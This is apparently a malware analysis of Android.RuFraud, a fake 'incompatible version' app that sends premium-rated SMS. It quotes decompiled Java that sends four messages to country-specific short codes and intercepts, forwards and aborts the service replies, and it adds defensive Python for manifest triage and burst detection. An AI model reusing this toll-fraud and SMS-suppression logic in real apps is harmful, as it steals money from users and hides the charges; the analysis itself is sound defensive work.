Detailed Analysis of Android.RuFraud

Intro: What is Android.RuFraud?

SuiConFo.apk is an application which sends premium-rated SMS messages. It is the first malicious app of this kind that was built specifically for European countries (Germany, Luxembourg, France, Belgium, Switzerland, Spain and Great Britain) and Canada rather than for the Chinese market. In the last few days many similar apps showed up in the official Google market; they have been grouped under the name RuFraud.

Analysis of the Application and Its Structure

The app requests the following permissions, although it uses only very few of them:

  • android.permission.SEND_SMS
  • android.permission.INSTALL_PACKAGES
  • android.permission.USE_CREDENTIALS
  • android.permission.BLUETOOTH_ADMIN
  • android.permission.INTERNET
  • android.permission.DEVICE_POWER
  • android.permission.READ_CONTACTS
  • android.permission.RECEIVE_SMS
  • android.permission.ACCESS_GPS
  • android.permission.ACCESS_LOCATION
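
A gap between requested permissions and the code that actually uses them is one of the first things to check when triaging a sample like this. The following Python script is an added example (not code from this analysis): it parses a manifest, flags the SEND_SMS plus RECEIVE_SMS pair, reports any receiver registered for SMS_RECEIVED with a raised priority, and lists requested permissions that neither analyzed class needs. The manifest text is constructed for the example: its permissions are the ten listed above, but the receiver declaration and the priority value 999 are assumptions about how such a receiver is typically declared, not values taken from the sample.

```python
"""Static manifest triage for the permission pattern in this write-up.

Added example, not code from the analysis. SAMPLE_MANIFEST is constructed:
the permissions are the ten listed in the write-up; the receiver block and
its priority value are assumptions, not values read from the sample.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
TOLL_FRAUD_PAIR = {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS"}

# Permissions the two analysed classes actually exercise: SmsManager.sendTextMessage
# needs SEND_SMS and an SMS_RECEIVED receiver needs RECEIVE_SMS. Nothing in the
# code the write-up describes needs any of the other requested permissions.
EXERCISED = TOLL_FRAUD_PAIR

SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="example.constructed.rufraud">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.USE_CREDENTIALS"/>
  <uses-permission android:name="android.permission.BLUETOOTH_ADMIN"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.DEVICE_POWER"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.ACCESS_GPS"/>
  <uses-permission android:name="android.permission.ACCESS_LOCATION"/>
  <application>
    <activity android:name=".MagicSMSActivity"/>
    <receiver android:name=".SMSReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an android:-namespaced attribute from an element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def permissions(manifest_xml):
    """Set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    return {attr(e, "name") for e in root.iter("uses-permission")}


def sms_receivers(manifest_xml):
    """(receiver name, filter priority) for every receiver filtering on SMS_RECEIVED."""
    root = ET.fromstring(manifest_xml)
    found = []
    for rcv in root.iter("receiver"):
        for flt in rcv.iter("intent-filter"):
            actions = {attr(a, "name") for a in flt.iter("action")}
            if SMS_RECEIVED in actions:
                found.append((attr(rcv, "name"), int(attr(flt, "priority") or 0)))
    return found


def triage(manifest_xml):
    """Findings a reviewer would raise before opening the bytecode."""
    findings = []
    perms = permissions(manifest_xml)
    if TOLL_FRAUD_PAIR <= perms:
        findings.append("requests both SEND_SMS and RECEIVE_SMS: premium-SMS fraud pattern")
    for name, prio in sms_receivers(manifest_xml):
        if prio > 0:
            findings.append("%s listens for SMS_RECEIVED at priority %d: "
                            "can see and abort incoming SMS before the inbox app" % (name, prio))
    unused = sorted(perms - EXERCISED)
    if unused:
        findings.append("%d requested permissions unused by the analysed code: %s"
                        % (len(unused), ", ".join(p.rsplit(".", 1)[-1] for p in unused)))
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST):
        print("-", line)
```

On a real APK the manifest is stored as binary XML, so the decoded text from apktool or a similar tool is what would be passed to triage(); the parsing and the checks are the same.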

It consists of the following two main classes, which are analyzed in detail below:

  • MagicSMSActivity
  • SMSReceiver

When the app has been installed successfully, the standard icon shows up in the dashboard (see left part of the picture). After opening the application, a pop-up message is displayed with the text “ERROR: Android version is not compatible” (see right part of the picture). To the user it seems that this app does not work on his/her smartphone. In reality, the app sends four premium-rated SMS messages in the background.

Analysis of MagicSMSActivity

This class is responsible for sending the paid SMS messages to predefined numbers. As the following code snippet shows, the app first reads the country ID from the SIM:

String str1 = ((TelephonyManager)getSystemService("phone")).getSimCountryIso();

Afterwards it checks whether this country ID is included in its list of services (the decompiled code below is a loop body, hence the continue statements):

if (str1.equals("ch")){
        str2 = "543";
        str3 = "GEHEN SP 300";
        continue;
}
if (str1.equals("lu")){
        str2 = "64747";
        str3 = "ACCESS SP";
        continue;
}
if (str1.equals("de")){
        str2 = "63000";
        str3 = "SP 462";
        continue;
}

The malicious application then sends four SMS messages to the phone number stored in str2 with the message text stored in str3:

localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);

For Germany, these SMS are sent to Net Mobile AG, which is well known for premium-rated SMS services. The price for one SMS ranges between 0,29€ and 1,99€.
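
Seen from the device or the operator side, the behaviour above leaves a simple trace: several identical outgoing messages to a short code within a few seconds. The following Python detector is an added example (not code from this analysis). It runs over a constructed message log whose line format is invented for the example; the short code 63000 and the text "SP 462" are the German pair quoted above, the remaining lines are filler, and the cost estimate uses the per-message price range given for Germany.

```python
"""Burst detector for outgoing premium SMS, run over a constructed message log.

Added example, not code from the write-up. The log line format is invented for
this example. 63000 / "SP 462" are the German short code and text quoted in the
analysis; the other lines are constructed filler.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r'^(\S+ \S+) (OUT|IN) number=(\S+) body="(.*)"$')
# Per-message price range the write-up gives for German premium SMS.
PRICE_MIN_EUR, PRICE_MAX_EUR = 0.29, 1.99

SAMPLE_LOG = """\
2011-12-12 10:31:02 OUT number=63000 body="SP 462"
2011-12-12 10:31:02 OUT number=63000 body="SP 462"
2011-12-12 10:31:03 OUT number=63000 body="SP 462"
2011-12-12 10:31:03 OUT number=63000 body="SP 462"
2011-12-12 10:31:20 IN number=63000 body="constructed: service confirmation"
2011-12-12 11:05:40 OUT number=+491701234567 body="constructed: see you at 7"
2011-12-12 11:06:10 OUT number=63000 body="SP 462"
""".splitlines()


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match the format."""
    m = LINE.match(line)
    if not m:
        return None
    ts, direction, number, body = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "dir": direction, "number": number, "body": body}


def is_short_code(number):
    """Premium services use short all-digit codes; subscriber numbers are longer or start with +."""
    return number.isdigit() and 3 <= len(number) <= 6


def find_bursts(lines, min_count=3, window_s=60):
    """Groups of >= min_count identical outgoing SMS to one short code within window_s seconds."""
    groups = defaultdict(list)
    for ev in map(parse_line, lines):
        if ev and ev["dir"] == "OUT" and is_short_code(ev["number"]):
            groups[(ev["number"], ev["body"])].append(ev["ts"])

    window = timedelta(seconds=window_s)
    bursts = []

    def emit(number, body, cluster):
        if len(cluster) >= min_count:
            bursts.append({"number": number, "body": body, "count": len(cluster),
                           "first": cluster[0], "last": cluster[-1]})

    for (number, body), stamps in groups.items():
        stamps.sort()
        cluster = [stamps[0]]
        for t in stamps[1:]:
            # A message belongs to the current cluster if it falls within the
            # window measured from the cluster's first message.
            if t - cluster[0] <= window:
                cluster.append(t)
            else:
                emit(number, body, cluster)
                cluster = [t]
        emit(number, body, cluster)
    return bursts


def estimated_cost_eur(burst):
    """(low, high) cost of a burst from the per-message price range."""
    return (round(burst["count"] * PRICE_MIN_EUR, 2),
            round(burst["count"] * PRICE_MAX_EUR, 2))


if __name__ == "__main__":
    for b in find_bursts(SAMPLE_LOG):
        print(b["count"], "x", repr(b["body"]), "to", b["number"],
              "between", b["first"], "and", b["last"],
              "cost approx. %.2f-%.2f EUR" % estimated_cost_eur(b))
```

The single message at 11:06:10 is outside the 60-second window of the first four and so does not join the burst; a stricter deployment could lower min_count or widen the window, at the cost of more false positives from legitimate short-code services.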

Analysis of SMSReceiver

This class implements an Android BroadcastReceiver, which is able to receive incoming SMS messages before the built-in SMS application receives them.

In this case the app checks whether the message comes from one of the stored numbers (the list is identical to the numbers the app sends messages to). If so, the message is forwarded to a specified number (0646112264) and the broadcast is aborted, so that neither the built-in SMS application nor the user notices the message. This can be seen in the following code snippet:

String str1 = arrayOfSmsMessage[0].getMessageBody();
str2 = arrayOfSmsMessage[0].getDisplayOriginatingAddress();
// Decompiler output: the condition reads inverted relative to the behaviour
// described above. The original most likely returns early here for senders not
// in the list, so the two lines below only run for the listed short codes.
if ((!str2.equals("81001")) && (!str2.equals("35064")) && (!str2.equals("63000")) && (!str2.equals("9903")) && (!str2.equals("60999")) && (!str2.equals("543")) && (!str2.equals("64747")))
abortBroadcast();
SmsManager.getDefault().sendTextMessage("0646112264", null, str1, null, null);
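
Why the user never sees the confirmation SMS comes down to how ordered broadcasts work: receivers are called in descending priority order, and one that aborts the broadcast stops delivery to everything behind it, including the inbox app. The following Python model is an added example (not code from this analysis, and it talks to no Android API): it reproduces that delivery order with a toy receiver that behaves as SMSReceiver is described above, and pairs it with the defender-side check that matters, comparing what the radio layer delivered against what reached the inbox. The short codes are the seven quoted in the snippet; the message bodies and the subscriber number are constructed. Note that since Android 4.4 third-party apps can no longer abort SMS_RECEIVED, and only the default SMS app receives SMS_DELIVER, which closes this interception technique on current devices.

```python
"""Model of an ordered SMS_RECEIVED broadcast and a suppression check.

Added example, not code from the write-up; nothing here touches a phone.
PREMIUM_NUMBERS and the forwarding number are the values quoted in the
analysis; message texts and the subscriber number are constructed.
"""
from dataclasses import dataclass, field

PREMIUM_NUMBERS = {"81001", "35064", "63000", "9903", "60999", "543", "64747"}
FORWARD_TO = "0646112264"


@dataclass
class Sms:
    originator: str
    body: str


@dataclass
class Broadcast:
    """One ordered broadcast; abort() stops delivery to lower-priority receivers."""
    sms: Sms
    aborted: bool = False

    def abort(self):
        self.aborted = True


@dataclass
class Receiver:
    """Plain receiver (stands in for the built-in SMS app): records what it gets."""
    name: str
    priority: int
    seen: list = field(default_factory=list)

    def on_receive(self, bc):
        self.seen.append(bc.sms)


class InterceptingReceiver(Receiver):
    """Behaviour described for SMSReceiver: forward replies from the premium
    short codes to FORWARD_TO and abort the broadcast so nobody else sees them."""

    def __init__(self, name, priority, outbox):
        super().__init__(name, priority)
        self.outbox = outbox

    def on_receive(self, bc):
        if bc.sms.originator in PREMIUM_NUMBERS:
            self.outbox.append((FORWARD_TO, bc.sms.body))
            bc.abort()
        # Any other message passes through untouched, so nothing looks wrong.


def deliver_ordered(receivers, sms):
    """Call receivers highest priority first; stop as soon as one aborts."""
    bc = Broadcast(sms)
    for r in sorted(receivers, key=lambda r: r.priority, reverse=True):
        r.on_receive(bc)
        if bc.aborted:
            break
    return bc


def suppressed_messages(delivered, inbox):
    """Defender check: messages the radio delivered that never reached the inbox."""
    return [s for s in delivered if s not in inbox.seen]


def run_scenario():
    """Two incoming messages: a premium-service reply and an ordinary text."""
    outbox = []
    inbox = Receiver("builtin-sms-app", priority=0)
    interceptor = InterceptingReceiver("SMSReceiver", priority=999, outbox=outbox)
    radio = [Sms("63000", "constructed: subscription confirmation"),
             Sms("+491701234567", "constructed: hi")]
    for sms in radio:
        deliver_ordered([inbox, interceptor], sms)
    return inbox, outbox, suppressed_messages(radio, inbox)


if __name__ == "__main__":
    inbox, outbox, hidden = run_scenario()
    print("inbox:", [s.originator for s in inbox.seen])
    print("forwarded:", outbox)
    print("hidden from user:", [s.originator for s in hidden])
```

The suppression check needs a vantage point below the app layer (the radio interface layer or operator delivery records), which is exactly what the victim does not have; on the device, the only visible symptom is the unexplained charge.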

Sample Information:

sha256:
98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2

md5:
1a3fb120e5a4bd51cb999a43e2d06d88

Mobile-Sandbox Report
